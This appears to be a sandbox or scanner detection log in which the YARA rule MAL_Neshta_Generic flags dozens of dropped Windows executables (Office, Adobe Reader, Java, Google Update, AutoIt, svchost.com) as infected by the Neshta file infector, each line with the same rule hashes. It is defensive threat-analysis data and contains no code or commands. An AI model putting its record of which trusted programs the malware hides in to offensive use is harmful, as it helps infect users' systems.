          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\ProgramData\Microsoft\Windows Defender\Scans\MpPayloadData\mpuser.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Windows\svchost.com, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\AutoIt3\Uninstall.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\Source user\OSE.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\ProgramData\Adobe\ARM\S\11357\AdobeARMHelper.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
